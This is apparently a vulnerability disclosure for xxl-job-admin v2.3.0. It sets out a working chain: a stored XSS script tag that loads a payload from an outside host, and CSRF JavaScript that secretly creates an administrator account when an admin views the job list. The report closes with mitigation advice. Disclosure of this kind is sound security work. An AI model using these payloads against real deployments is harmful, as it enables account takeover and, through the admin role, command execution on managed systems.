Version and Deployment

Product Version

xxl-job-admin v2.3.0

Deployment

mkdir -p /tmp/xxl-job

docker run -d -e PARAMS="--spring.datasource.url=jdbc:mysql://{MYSQL_IP}:{MYSQL_PORT}/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=UTC --spring.datasource.username={MYSQL_USER} --spring.datasource.password={MYSQL_PASSWD} --spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver" -p {XXL-JOB-ADMIN_SERVICE_PORT}:8080 -v /tmp/xxl-job:/data/applogs --name xxl-job -d xuxueli/xxl-job-admin:2.3.0

Replace {MYSQL_IP}``{MYSQL_PORT}``{MYSQL_USER}``{MYSQL_PASSWD}``{XXL-JOB-ADMIN_SERVICE_PORT} with the actual parameter

And then Import https://github.com/xuxueli/xxl-job/blob/master/doc/db/tables_xxl_job.sql into MySQL

Store XSS

There are two user admin (administrator) and tari(normal user with only default executor permission) in this example.

Log in to tari account, and go to http://127.0.0.1:8089/xxl-job-admin/jobinfo [任务管理] > drop down [操作] box > [编辑]

Input the xss code in [任务描述]

<script src="http://tari.local:8888/payload1.js"/>

The payload1.js content is

alert(2)

Click [保存] to save, What is actually called here is the http://127.0.0.1:8089/xxl-job-admin/jobinfo/update API interface.

Stored XSS is triggered by an admin accessing a http://127.0.0.1:8089/xxl-job-admin/jobinfo

Use CSRF to Bypass HttpOnly

We can see thathttpOnlyis enabled on this site, which means we cannot get administrator cookies directly

If we look at the HTTP request packet, there is no similar CSRFTOKEN field

So we can modify payload1.js to bypass HttpOnly

const xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (this.readyState === 4) {
       console.log('pwn')
    }
};
xhr.open("POST", "http://127.0.0.1:8089/xxl-job-admin/user/add", false);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
const params = "username=bypass&password=bypass&role=1&permission=";
xhr.send(params);

The next time an administrator accesses to http://127.0.0.1:8089/xxl-job-admin/jobinfo we will get an administrator user bypass/bypass

Other XSS Output Location

http://127.0.0.1:8089/xxl-job-admin/jobinfo [任务管理] > drop down [操作] box > [查询日志]

Here also can trigger XSS

Further Thinking on Exploiting vulnerabilities

xxl-job is a distributed task scheduling platform. If we have administrator privileges, it means we can execute arbitrary commands on all subsets of managed tasks

Mitigation

1. Validate to catch potentially malicious user-provided input in /xxl-job-admin/jobinfo/update API
2. HTML entity encode data from backend API to prevent potentially XSS.
3. Use CSRFToken to Prevent CSRF